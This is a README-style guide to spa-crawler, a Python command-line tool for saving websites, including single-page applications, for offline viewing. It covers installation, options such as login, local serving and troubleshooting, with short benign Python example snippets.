spa-crawler is a tool that helps you save complete websites to your computer. It works through a command-line interface, which means you type commands into a terminal or command prompt. The program can log in to websites if needed, browse through pages, and copy the content along with images, scripts, and other files. The saved copy can then be served from a simple web server or opened directly from your computer.
This tool is handy if you want to keep a local copy of a website for offline browsing, backup, or analysis.
To run spa-crawler, your computer must meet a few requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or Linux (Ubuntu 18.04+ recommended)
- Memory: At least 4 GB of RAM for smooth operation
- Storage: Minimum 500 MB free space (more depending on website size)
- Python: Python 3.7 or higher installed (spa-crawler runs on Python)
- Internet Connection: Required to download the software and crawl websites
- Command Prompt or Terminal: You will use a text-based console to run commands
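A quick way to confirm the Python requirement above is met is to ask Python itself:

```python
import sys

# The requirements above call for Python 3.7 or newer.
if sys.version_info >= (3, 7):
    print("Python version OK:", sys.version.split()[0])
else:
    print("Upgrade needed: found", sys.version.split()[0])
```

You can also run `python --version` in your terminal for the same information.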
- Download: Use the button at the top or below to go to the download page.
- Install Python: If you do not already have Python 3.7 or newer, download it from python.org. During installation, make sure to check the box "Add Python to PATH".
- Download spa-crawler software: This will be a zipped folder or installer you can save on your computer.
- Open your terminal or command prompt: This is where you will type commands.
- Unpack spa-crawler: If you downloaded a zip file, extract it to a folder you can find easily on your computer.
- Install dependencies: Some extra software components are needed to run spa-crawler. You will install these using Python's package manager.
Visit the download page for spa-crawler (the button at the top of this page takes you there). Once on the page:
- Choose the latest version available.
- Download the file matching your system (for example, .zip for Windows/macOS/Linux).
- Save the file to a folder on your computer.
After extracting the files:
- Open your terminal (on Windows, press Win + R, type cmd, and press Enter; on macOS/Linux, open the Terminal app).
- Use the cd command to change directory to the folder where you extracted spa-crawler. For example: cd C:\Users\YourName\Downloads\spa-crawler
- Run this command to install needed packages:
pip install -r requirements.txt
This command downloads and installs tools that spa-crawler needs to run properly.
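If you are unsure whether the dependency install succeeded, Python can report whether a package is importable without importing it. The package name below is a standard-library placeholder; substitute the names listed in spa-crawler's requirements file:

```python
import importlib.util

# Check whether Python can locate a package without importing it.
# "json" is a stdlib placeholder; replace it with the package names
# from spa-crawler's requirements file.
for pkg in ["json"]:
    spec = importlib.util.find_spec(pkg)
    print(pkg, "installed" if spec else "missing")
```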
After installation, you use spa-crawler through your terminal. You type commands to tell it what to do.
python spa_crawler.py [options]
- --url [website address]: The website you want to copy.
- --output [folder]: Where to save the copied website.
- --login: Optional; if the website needs you to log in, use this along with credentials.
- --help: Lists all commands and options.
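For readers curious how these flags fit together on a command line, here is a minimal argparse sketch of a parser shaped like spa-crawler's options. This is a hypothetical illustration, not spa-crawler's actual code:

```python
import argparse

# Hypothetical parser mirroring the documented flags; spa-crawler's
# real argument handling may differ.
parser = argparse.ArgumentParser(prog="spa_crawler.py")
parser.add_argument("--url", required=True, help="The website you want to copy")
parser.add_argument("--output", default="output", help="Where to save the copied website")
parser.add_argument("--login", action="store_true", help="Log in before crawling")
parser.add_argument("--username")
parser.add_argument("--password")

args = parser.parse_args(["--url", "https://example.com", "--output", "site_copy"])
print(args.url, args.output)  # -> https://example.com site_copy
```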
To save a website's pages and files to a folder named site_copy:
python spa_crawler.py --url https://example.com --output site_copy
spa-crawler will visit the site, download pages, images, and scripts, then save them to site_copy.
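To picture what that step involves, here is a toy sketch (not spa-crawler's code) of how a crawler finds the assets referenced by one page, using only the standard library:

```python
from html.parser import HTMLParser

class AssetCollector(HTMLParser):
    """Collect the URLs a crawler would need to download for one page."""
    def __init__(self):
        super().__init__()
        self.assets = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "img" and "src" in attrs:
            self.assets.append(attrs["src"])
        elif tag == "script" and "src" in attrs:
            self.assets.append(attrs["src"])
        elif tag == "link" and attrs.get("rel") == "stylesheet":
            self.assets.append(attrs["href"])

page = ('<html><head><link rel="stylesheet" href="app.css"></head>'
        '<body><img src="logo.png"><script src="app.js"></script></body></html>')
collector = AssetCollector()
collector.feed(page)
print(collector.assets)  # -> ['app.css', 'logo.png', 'app.js']
```

A real crawler such as spa-crawler additionally executes the page's JavaScript in a browser engine before collecting links, which is what makes SPA content visible at all.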
If the website requires a username and password, you can tell spa-crawler to log in before copying pages:
python spa_crawler.py --url https://example.com --output site_copy --login --username yourname --password yourpass
Replace yourname and yourpass with your credentials.
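Passwords typed on the command line end up in your shell history. If you script the invocation, one common workaround is reading credentials from environment variables. A sketch under that assumption (the variable names SPA_USER and SPA_PASS are made up for illustration):

```python
import os

# Hypothetical: pull credentials from environment variables instead of
# typing them into the command line. SPA_USER / SPA_PASS are
# illustrative names, not something spa-crawler defines.
username = os.environ.get("SPA_USER", "yourname")
password = os.environ.get("SPA_PASS", "yourpass")

cmd = [
    "python", "spa_crawler.py",
    "--url", "https://example.com",
    "--output", "site_copy",
    "--login", "--username", username, "--password", password,
]
print(" ".join(cmd))
```

You could pass `cmd` to `subprocess.run` rather than printing it.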
spa-crawler includes:
- Support for Single Page Applications (SPA): Handles websites built with modern JavaScript frameworks.
- Browser Automation: Uses a real browser engine to load pages, which helps with dynamic content.
- Selective Crawling: You can limit the depth or scope of the crawl.
- Static Asset Download: Saves images, stylesheets, and scripts to keep the offline site looking correct.
- Command-Line Interface: No need for a graphical program; works in terminal or console.
- Customizable Output: Organize saved files into folders as needed.
- Login Automation: Can automatically provide login information for secure sites.
Once spa-crawler finishes, your saved site is ready for use:
- Open the folder you chose for output.
- Inside, you will find HTML files and folders of assets.
- You can open the main HTML file in any web browser (Chrome, Firefox, Edge).
- For better results, you can use a simple static web server program like Caddy, Python's HTTP server, or others.
Example using Python's built-in server:
- Open a terminal in the output folder.
- Run: python -m http.server
- Open a browser and visit http://localhost:8000 to view your saved site.
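If you prefer starting the server from a script rather than the command line, the same standard-library module can be driven programmatically. A minimal sketch, serving the current directory on an automatically chosen port (substitute your output folder for "."):

```python
import functools
import http.server
import threading
import urllib.request

# Serve a folder the same way `python -m http.server` does, from code.
# directory="." stands in for your output folder, e.g. "site_copy".
handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=".")
server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
port = server.server_address[1]  # port 0 asks the OS for a free port
threading.Thread(target=server.serve_forever, daemon=True).start()

# Fetch the root to confirm the server is up.
status = urllib.request.urlopen(f"http://127.0.0.1:{port}/").status
print("server responded with HTTP", status)
server.shutdown()
```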
- Python is not found: Ensure Python is installed and added to your system path.
- Permission errors: Try running the terminal or command prompt as administrator (right-click and choose "Run as administrator").
- Timeouts or slow downloads: Some websites limit crawling speed. Use the --delay option, if available, to add waits between requests.
- Login fails: Double-check your credentials, or try alternative login methods if supported.
- Folders too large: Large sites take much space. Limit crawling depth or number of pages if needed.
- No output files: Check that you ran the command in the correct folder and with the right options.
- Help is available: Run python spa_crawler.py --help to see all options and usage tips.
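The --delay idea mentioned in the troubleshooting list is simply a pause between requests. Conceptually, a throttled fetch loop looks like this (a sketch, with a stand-in for the real download step):

```python
import time

def polite_fetch(urls, delay=0.1, fetch=print):
    """Sketch of a --delay style throttle: wait between requests so the
    target site is not hammered. `fetch` stands in for the real download."""
    for url in urls:
        fetch(url)
        time.sleep(delay)

start = time.monotonic()
polite_fetch(["https://example.com/a", "https://example.com/b"])
elapsed = time.monotonic() - start
print("took at least 0.2s:", elapsed >= 0.2)  # -> took at least 0.2s: True
```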
For advanced use, detailed commands, and configuration files, check the full documentation inside the downloaded files or on the GitHub project page.
Only crawl websites you own or have permission to copy. Be respectful of site terms and robots.txt rules. Use spa-crawler responsibly.